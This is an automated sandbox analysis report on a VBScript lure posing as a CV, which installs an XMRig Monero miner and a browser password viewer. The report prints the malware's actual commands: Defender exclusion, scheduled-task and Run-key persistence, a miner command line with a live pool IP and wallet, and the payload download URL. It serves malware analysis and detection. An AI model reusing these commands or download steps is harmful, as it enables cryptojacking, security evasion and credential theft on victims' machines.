Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
curriculum_vitae-copie.vbs

Overview

General Information

Sample Name:curriculum_vitae-copie.vbs
Analysis ID:882715
MD5:f72b1d9e4780f7b1b63fc2e2e88f1593
SHA1:95f3a182de433dac071eb353f1abd50b8643aabe
SHA256:4a346ad97d3b8093e61c3a0ab67a1a6611fb5c399725eea10becbdd0f331ee13
Tags:vbs
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

VBScript performs obfuscated calls to suspicious functions
System process connects to network (likely due to code injection or exploit)
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Sigma detected: Register Wscript In Run Key
Multi AV Scanner detection for dropped file
Sigma detected: Xmrig
Wscript called in batch mode (surpress errors)
Found strings related to Crypto-Mining
Wscript starts Powershell (via cmd or directly)
Query firmware table information (likely to detect VMs)
Potential malicious VBS script found (suspicious strings)
Sample is not signed and drops a device driver
Queries sensitive share information (via WMI, WIN32_SHARE, often done to detect sandboxes)
Deletes itself after installation
Adds a directory exclusion to Windows Defender
Uses schtasks.exe or at.exe to add and modify task schedules
Potential evasive VBS script found (sleep loop)
Potential malicious VBS script found (has network functionality)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Yara detected WebBrowserPassView password recovery tool
Queries sensitive share information (via WMI, Win32_Share, often done to detect virtual machines)
Machine Learning detection for dropped file
Drops PE files to the user root directory
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Uses a known web browser user agent for HTTP communication
Creates driver files
Drops PE files to the user directory
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
PE file contains sections with non-standard names
Found potential string decryption / allocating functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Enables debug privileges
PE file contains an invalid checksum
Enables security privileges
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 3484 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\curriculum_vitae-copie.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • wscript.exe (PID: 6984 cmdline: C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\curriculum_vitae-copie.vbs MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
      • cmd.exe (PID: 7080 cmdline: C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l: MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 5932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 7028 cmdline: powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:" MD5: 95000560239032BC68B4C2FDFCDEF913)
      • 7g.exe (PID: 5428 cmdline: C:\Users\Public\7g.exe" e -p1625092 -y -o"C:\Users\Public\WindowsUpdate" "C:\Users\Public\gmail.7z MD5: F7D5BA4EC2A88F2FF1F0ABEC61108A0B)
        • conhost.exe (PID: 4384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 5724 cmdline: C:\Windows\System32\cmd.exe" /c schtasks.exe /create /f /tn MicrosoftUpdateService /XML "%public%\WindowsUpdate\Update.xml MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 5272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 6028 cmdline: schtasks.exe /create /f /tn MicrosoftUpdateService /XML "C:\Users\Public\WindowsUpdate\Update.xml" MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
      • wscript.exe (PID: 5244 cmdline: "C:\Windows\System32\wscript.exe" "C:\Users\Public\WindowsUpdate\mozilla.vbs" //b //nologo MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • wscript.exe (PID: 4860 cmdline: wscript.exe C:\Users\Public\windowsupdate\mservice.vbs //b //nologo MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • mservice.exe (PID: 3476 cmdline: "C:\Users\Public\windowsupdate\mservice.exe" -o 141.94.96.144:443 -u 42i5pNZm7cvXC77nHzvzhReAfaVbJX4GVXYvea8hKhUXHUZHQFDxwFJMCcZz959w8KELv8fFgk6DKExQQ9UHAxAuCJ5abbu -p 0606-17h28m --coin=monero -k --tls --donate-level=0 --randomx-mode=light --threads=8 --pause-on-active=10 --no-title MD5: CFC0000B993A31C11EF58AC53837E4E1)
      • conhost.exe (PID: 3536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • wscript.exe (PID: 4620 cmdline: "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • wscript.exe (PID: 6596 cmdline: "C:\Windows\system32\wscript.exe" "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • wscript.exe (PID: 6548 cmdline: "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • wscript.exe (PID: 6712 cmdline: "C:\Windows\system32\wscript.exe" "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • wscript.exe (PID: 6860 cmdline: "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\Public\WindowsUpdate\mservice.vbsPUA_Crypto_Mining_CommandLine_Indicators_Oct21Detects command line parameters often used by crypto mining softwareFlorian Roth (Nextron Systems)
  • 0x440:$s02: --donate-level=0
C:\Users\Public\WindowsUpdate\WinRing0x64.sysPUA_VULN_Driver_OpenLibSysorg_WinRingsys_WinRing_7Q9nDetects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - 0c0195c48b6b8582fa6f6373032118da.bin, 27bcbeec8a466178a6057b64bef66512.binFlorian Roth
  • 0x1789:$: 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6F 00 6E 00 00 00 00 00 57 00 69 00 6E 00 52 00 69 00 6E 00 67 00 30
  • 0x1749:$: 00 43 00 6F 00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4F 00 70 00 65 00 6E 00 4C 00 69 00 62 00 53 00 79 00 73 00 2E 00 6F 00 72 00 67
  • 0x17c5:$: 00 46 00 69 00 6C 00 65 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 00 00 31 00 2E 00 32 00 2E 00 30 00 2E 00 35
  • 0x1949:$: 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 31 00 2E 00 32 00 2E 00 30 00 2E 00 35
  • 0x17f5:$: 00 49 00 6E 00 74 00 65 00 72 00 6E 00 61 00 6C 00 4E 00 61 00 6D 00 65 00 00 00 57 00 69 00 6E 00 52 00 69 00 6E 00 67 00 30 00 2E 00 73 00 79 00 73
  • 0x1915:$: 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 57 00 69 00 6E 00 52 00 69 00 6E 00 67 00 30
  • 0x18d1:$: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 57 00 69 00 6E 00 52 00 69 00 6E 00 67 00 30 00 2E 00 73 00 79 00 73
  • 0x1831:$: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 20 00 28 00 43 00 29 00 20 00 32 00 30 00 30 ...
C:\Users\Public\WindowsUpdate\ps.exeJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
    C:\Users\Public\WindowsUpdate\mservice.exeXMRIG_Monero_MinerDetects Monero mining softwareFlorian Roth (Nextron Systems)
    • 0x427fc0:$s1: 'h' hashrate, 'p' pause, 'r' resume
    • 0x422176:$s2: --cpu-affinity
    • 0x422190:$s3: set process affinity to CPU core(s), mask 0x3 for cores 0 and 1
    • 0x421a68:$s4: password for mining server
    C:\Users\Public\WindowsUpdate\mservice.exePUA_Crypto_Mining_CommandLine_Indicators_Oct21Detects command line parameters often used by crypto mining softwareFlorian Roth (Nextron Systems)
    • 0x422235:$s01: --cpu-priority=
    • 0x421b8d:$s05: --nicehash
    Click to see the 3 entries

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000011.00000002.868028749.0000022E67CE5000.00000004.00000020.00020000.00000000.sdmpPUA_Crypto_Mining_CommandLine_Indicators_Oct21Detects command line parameters often used by crypto mining softwareFlorian Roth (Nextron Systems)
    • 0x3810:$s02: --donate-level=0
    00000013.00000002.992637368.000001854050B000.00000004.00000020.00020000.00000000.sdmpPUA_Crypto_Mining_CommandLine_Indicators_Oct21Detects command line parameters often used by crypto mining softwareFlorian Roth (Nextron Systems)
    • 0x67f9:$s02: --donate-level=0
    0000000B.00000003.815621184.0000000001480000.00000004.00001000.00020000.00000000.sdmpPUA_Crypto_Mining_CommandLine_Indicators_Oct21Detects command line parameters often used by crypto mining softwareFlorian Roth (Nextron Systems)
    • 0x440:$s02: --donate-level=0
    00000019.00000003.898659213.000001FFE094A000.00000004.00000020.00020000.00000000.sdmpwebshell_asp_sqlASP webshell giving SQL access. Might also be a dual use tool.Arnim Rupp
    • 0x3e76:$sql3: System
    • 0x10c16:$sql3: System
    • 0x3004:$sql7: Open
    • 0xfda4:$sql7: Open
    • 0x4040:$o_sql2: CreateObject
    • 0x10de0:$o_sql2: CreateObject
    • 0x309e:$o_sql3: open
    • 0xfe3e:$o_sql3: open
    • 0x4040:$a_sql3: CreateObject
    • 0x10de0:$a_sql3: CreateObject
    • 0x2f4c:$a_sql4: createobject
    • 0x2fbe:$a_sql4: createobject
    • 0xfcec:$a_sql4: createobject
    • 0xfd5e:$a_sql4: createobject
    • 0x309e:$a_sql5: open
    • 0xfe3e:$a_sql5: open
    • 0x309e:$c_sql3: open
    • 0xfe3e:$c_sql3: open
    • 0x1c70:$sus5: cmd.exe
    • 0x6224:$tagasp_short1: <%\x11
    • 0x2746:$tagasp_classid5: 0D43FE01-F093-11CF-8940-00A0C9054228
    0000000B.00000003.816824886.0000000003A20000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
      Click to see the 28 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      11.3.7g.exe.3a0ca00.3.raw.unpackPUA_VULN_Driver_OpenLibSysorg_WinRingsys_WinRing_7Q9nDetects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - 0c0195c48b6b8582fa6f6373032118da.bin, 27bcbeec8a466178a6057b64bef66512.binFlorian Roth
      • 0x1789:$: 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6F 00 6E 00 00 00 00 00 57 00 69 00 6E 00 52 00 69 00 6E 00 67 00 30
      • 0x1749:$: 00 43 00 6F 00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4F 00 70 00 65 00 6E 00 4C 00 69 00 62 00 53 00 79 00 73 00 2E 00 6F 00 72 00 67
      • 0x17c5:$: 00 46 00 69 00 6C 00 65 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 00 00 31 00 2E 00 32 00 2E 00 30 00 2E 00 35
      • 0x1949:$: 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 31 00 2E 00 32 00 2E 00 30 00 2E 00 35
      • 0x17f5:$: 00 49 00 6E 00 74 00 65 00 72 00 6E 00 61 00 6C 00 4E 00 61 00 6D 00 65 00 00 00 57 00 69 00 6E 00 52 00 69 00 6E 00 67 00 30 00 2E 00 73 00 79 00 73
      • 0x1915:$: 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 57 00 69 00 6E 00 52 00 69 00 6E 00 67 00 30
      • 0x18d1:$: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 57 00 69 00 6E 00 52 00 69 00 6E 00 67 00 30 00 2E 00 73 00 79 00 73
      • 0x1831:$: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 20 00 28 00 43 00 29 00 20 00 32 00 30 00 30 ...
      11.3.7g.exe.35b7600.1.unpackJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
        11.3.7g.exe.35b7600.1.raw.unpackXMRIG_Monero_MinerDetects Monero mining softwareFlorian Roth (Nextron Systems)
        • 0x3f09c0:$s1: 'h' hashrate, 'p' pause, 'r' resume
        • 0x3eab76:$s2: --cpu-affinity
        • 0x3eab90:$s3: set process affinity to CPU core(s), mask 0x3 for cores 0 and 1
        • 0x3ea468:$s4: password for mining server
        11.3.7g.exe.35b7600.1.raw.unpackPUA_Crypto_Mining_CommandLine_Indicators_Oct21Detects command line parameters often used by crypto mining softwareFlorian Roth (Nextron Systems)
        • 0x3eac35:$s01: --cpu-priority=
        • 0x3ea58d:$s05: --nicehash
        11.3.7g.exe.35b7600.1.raw.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth (Nextron Systems)
        • 0x3f04b8:$x1: donate.ssl.xmrig.com
        • 0x3f09b1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
        Click to see the 14 entries

        Sigma Signatures

        Bitcoin Miner

        barindex
        Sigma detected: Xmrig
        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Users\Public\windowsupdate\mservice.exe" -o 141.94.96.144:443 -u 42i5pNZm7cvXC77nHzvzhReAfaVbJX4GVXYvea8hKhUXHUZHQFDxwFJMCcZz959w8KELv8fFgk6DKExQQ9UHAxAuCJ5abbu -p 0606-17h28m --coin=monero -k --tls --donate-level=0 --randomx-mode=light --threads=8 --pause-on-active=10 --no-title, CommandLine: "C:\Users\Public\windowsupdate\mservice.exe" -o 141.94.96.144:443 -u 42i5pNZm7cvXC77nHzvzhReAfaVbJX4GVXYvea8hKhUXHUZHQFDxwFJMCcZz959w8KELv8fFgk6DKExQQ9UHAxAuCJ5abbu -p 0606-17h28m --coin=monero -k --tls --donate-level=0 --randomx-mode=light --threads=8 --pause-on-active=10 --no-title, CommandLine|base64offset|contains: , Image: C:\Users\Public\WindowsUpdate\mservice.exe, NewProcessName: C:\Users\Public\WindowsUpdate\mservice.exe, OriginalFileName: C:\Users\Public\WindowsUpdate\mservice.exe, ParentCommandLine: wscript.exe C:\Users\Public\windowsupdate\mservice.vbs //b //nologo, ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 4860, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Users\Public\windowsupdate\mservice.exe" -o 141.94.96.144:443 -u 42i5pNZm7cvXC77nHzvzhReAfaVbJX4GVXYvea8hKhUXHUZHQFDxwFJMCcZz959w8KELv8fFgk6DKExQQ9UHAxAuCJ5abbu -p 0606-17h28m --coin=monero -k --tls --donate-level=0 --randomx-mode=light --threads=8 --pause-on-active=10 --no-title, ProcessId: 3476, ProcessName: mservice.exe

        Persistence and Installation Behavior

        barindex
        Sigma detected: Register Wscript In Run Key
        Source: Registry Key setAuthor: Joe Security: Data: Details: wscript.exe "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\wscript.exe, ProcessId: 6984, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Media Service

        Snort Signatures

        No Snort rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus detection for dropped file
        Source: C:\Users\Public\WindowsUpdate\mservice.exeAvira: detection malicious, Label: HEUR/AGEN.1311290
        Multi AV Scanner detection for submitted file
        Source: curriculum_vitae-copie.vbsVirustotal: Detection: 10%Perma Link
        Multi AV Scanner detection for dropped file
        Source: C:\Users\Public\WindowsUpdate\mservice.exeReversingLabs: Detection: 83%
        Source: C:\Users\Public\WindowsUpdate\ps.exeReversingLabs: Detection: 80%
        Machine Learning detection for dropped file
        Source: C:\Users\Public\WindowsUpdate\ps.exeJoe Sandbox ML: detected
        Source: C:\Users\Public\WindowsUpdate\mservice.exeJoe Sandbox ML: detected

        Bitcoin Miner

        barindex
        Yara detected Xmrig cryptocurrency miner
        Source: Yara matchFile source: 11.3.7g.exe.35b7600.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.3.7g.exe.3580000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.0.mservice.exe.7ff7a0a50000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000013.00000000.863918261.00007FF7A0D92000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: 7g.exe PID: 5428, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: mservice.exe PID: 3476, type: MEMORYSTR
        Source: Yara matchFile source: C:\Users\Public\WindowsUpdate\mservice.exe, type: DROPPED
        Found strings related to Crypto-Mining
        Source: 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
        Source: 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: cryptonight/0
        Source: 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
        Source: 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: -o, --url=URL URL of mining server
        Source: unknownHTTPS traffic detected: 49.12.202.237:443 -> 192.168.2.6:49712 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.6:49713 version: TLS 1.2
        Source: Binary string: .pdbo` source: 7g.exe, 0000000B.00000003.816824886.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, go.exe.11.dr
        Source: Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: 7g.exe, 0000000B.00000003.816824886.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.dr
        Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, WinRing0x64.sys.11.dr
        Source: C:\Users\Public\7g.exeCode function: 11_2_003B716C __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,11_2_003B716C
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Adobe\Acrobat\Jump to behavior
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Jump to behavior
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Adobe\Jump to behavior
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
        Source: C:\Users\Public\7g.exeCode function: 11_2_003B6553 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,11_2_003B6553

        Networking

        barindex
        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\System32\wscript.exeNetwork Connect: 49.12.202.237 443Jump to behavior
        Source: C:\Windows\System32\wscript.exeDomain query: www.7-zip.org
        Source: C:\Windows\System32\wscript.exeDomain query: gitlab.com
        Source: C:\Windows\System32\wscript.exeNetwork Connect: 172.65.251.78 443Jump to behavior
        Potential malicious VBS script found (has network functionality)
        Source: Initial file: .write L5caQRBcFL5.responseBody
        Source: Initial file: .savetofile L5M2srg9CbnIL5, 2
        Source: C:\Users\Public\7g.exeDropped file: .write L5xL5.responseBodyJump to dropped file
        Source: C:\Users\Public\7g.exeDropped file: .savetofile L5sL5, 2 '//overwriteJump to dropped file
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: global trafficHTTP traffic detected: GET /a/7zr.exe HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.7-zip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /cv4345521/cv/-/raw/main/gmail.7z?inline=false HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gitlab.comConnection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 172.65.251.78 172.65.251.78
        Source: 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, WinRing0x64.sys.11.drString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
        Source: 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, WinRing0x64.sys.11.drString found in binary or memory: http://crl.globalsign.net/Root.crl0
        Source: 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, WinRing0x64.sys.11.drString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
        Source: 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, WinRing0x64.sys.11.drString found in binary or memory: http://crl.globalsign.net/primobject.crl0
        Source: wscript.exe, 00000005.00000003.811414806.000002216311D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858655277.000002216311D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.000002216311D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.000002216311D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: 7g.exe, 0000000B.00000003.816824886.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.drString found in binary or memory: http://www.nirsoft.net/
        Source: wscript.exe, 00000005.00000003.811414806.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.857991730.0000022163565000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858632166.000002216318E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
        Source: wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://content-cloudbilling.googleapis.com
        Source: wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://content-cloudresourcemanager.googleapis.com
        Source: wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://content-compute.googleapis.com
        Source: wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://content.googleapis.com
        Source: wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://customers.gitlab.com
        Source: wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com
        Source: wscript.exe, 00000005.00000003.811414806.000002216311D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858655277.000002216311D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.000002216311D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.000002216311D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/
        Source: wscript.exe, 00000005.00000003.811836031.0000022165974000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858632166.000002216318E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/sandbox/
        Source: wscript.exe, 00000005.00000003.811836031.0000022165974000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858632166.000002216318E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/speedscope/index.html
        Source: wscript.exe, 00000005.00000003.811836031.0000022165974000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858632166.000002216318E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/admin/
        Source: wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/assets/
        Source: wscript.exe, 00000005.00000003.475087374.0000022162DC5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163163000.00000004.00000020.00020000.00000000.sdmp, curriculum_vitae-copie.vbsString found in binary or memory: https://gitlab.com/cv4345521/cv/-/raw/main/gmail.7z?inline=false
        Source: wscript.exe, 00000005.00000003.811414806.0000022163163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/cv4345521/cv/-/raw/main/gmail.7z?inline=falseA
